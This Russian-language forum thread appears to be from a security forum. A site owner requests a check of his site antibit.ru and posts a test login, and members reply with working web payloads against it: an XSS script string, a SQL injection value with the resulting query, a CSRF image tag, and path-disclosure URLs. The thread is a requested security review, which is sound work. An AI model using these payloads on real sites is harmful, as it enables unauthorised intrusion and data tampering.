 |
ВАП сайт. Нужна проверка. |
14.11.2009, 00:37
|
|
Новичок
Регистрация: 28.03.2008
Сообщений: 24
С нами:
9537021
Репутация:
-5
|
|
ВАП сайт. Нужна проверка.
Cайт antibit.ru
Проверьте пожалуйста, тем кто чем-нибудь поможет, буду очень и весьма признателен.
Картинка ачата стоит.
Тестовый Аккаунт:
login: antichat
pass: antichat
Хотелось бы проверить:
http://antibit.ru/forum/ (особенно при добавлении файла в тему)
http://antibit.ru/add/
http://antibit.ru/kontakts/
http://antibit.ru/ignors/
http://antibit.ru/files
Последний раз редактировалось azote; 28.05.2010 в 16:57..
|
|
|
14.11.2009, 15:25
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
С нами:
10025299
Репутация:
412
|
|
antibit.ru/index.php?do=files&name[]=Din
раскрытие пути
------------------
index.php?do=files&name=Din
пасив xss в поиске
|
|
|
|
15.11.2009, 02:21
|
|
Новичок
Регистрация: 23.12.2008
Сообщений: 18
С нами:
9148514
Репутация:
7
|
|
Сообщение от azote
Cпасибо, убрал.
А можно поподробней узнать где тут Хss ?
гг перейди: http://antibit.ru/index.php?do=files&name=Din
и в поиске напишы: "><script>alert()</script>
Последний раз редактировалось XenkoK; 15.11.2009 в 02:23..
|
|
|
|
22.12.2009, 21:48
|
|
Новичок
Регистрация: 28.03.2008
Сообщений: 24
С нами:
9537021
Репутация:
-5
|
|
Акутально. Картинка ачата стоит. Тестовый акк дал. В шапке указал модули которые хотелось бы проверить.
Последний раз редактировалось azote; 23.12.2009 в 21:43..
|
|
|
|
23.12.2009, 01:20
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами:
9223466
Репутация:
3171
|
|
http://antibit.ru/index.php?do=members&orderby[]=warn_up
|
|
|
|
03.01.2010, 18:54
|
|
Новичок
Регистрация: 16.12.2009
Сообщений: 18
С нами:
8633175
Репутация:
3
|
|
http://antibit.ru/members/ в поиске кавычку отфильтруй!
|
|
|
|
22.04.2010, 23:35
|
|
Новичок
Регистрация: 28.03.2008
Сообщений: 24
С нами:
9537021
Репутация:
-5
|
|
Хотелось бы првоерить:
http://antibit.ru/forum/
http://antibit.ru/members/
http://antibit.ru/kontakts/
http://antibit.ru/ignors/
|
|
|
|
23.04.2010, 04:57
|
|
Познающий
Регистрация: 13.04.2010
Сообщений: 42
С нами:
8463290
Репутация:
81
|
|
SQL
SQL-injection в insert-е, вроде как слепая.
Уязвимо поле причина жалобы в форуме когда нажимаем пожаловаться.
http://antibit.ru/forum/topic_101/report/2
вставил
123','123338', 'system', '1271983556', 'no', VERSION())/*
прошло
123','123338', 'system', '1271983556', 'no', VERSION()')/*
обана
PHP код:
INSERT INTO dle_pm (subj, text, user, user_from, date, pm_read, folder) values ('Жалоба на сообщение форума.', 'Данную жалобу вам отправил antichat<br>
Текст жалобы: 123','123338', 'system', '1271983556', 'no', VERSION()')/*<br>
Тема: <a href="http://antibit.ru/index.php?do=forum&showtopic=255">Перейти в тему</a><br>
ID сообщения: 2', 338, 'system', '1271983702', 'no', 'inbox')
Раскрытие путей:
PHP код:
Warning: socket_write(): 21 is not a valid Socket resource in /home/a/antibitru/public_html/engine/classes/icq.class.php on line 239 Warning: socket_close(): 21 is not a valid Socket resource in /home/a/antibitru/public_html/engine/classes/icq.class.php on line 294
http://antibit.ru/icq_send/send/359
CSRF:
Добавляем В ИГНОР:
<img src="http://antibit.ru/ignors/add/358" alt="" />
Последний раз редактировалось life_glider; 23.04.2010 в 20:30..
|
|
|
|
28.05.2010, 16:57
|
|
Новичок
Регистрация: 28.03.2008
Сообщений: 24
С нами:
9537021
Репутация:
-5
|
|
Обновил шапку, проверьте пожалуйста.
|
|
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Регеры ICQ UIN'ов by saiNT
|
sai_NT |
Skype, IRC, ICQ, Jabber и другие IM |
481 |
17.09.2010 17:58 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
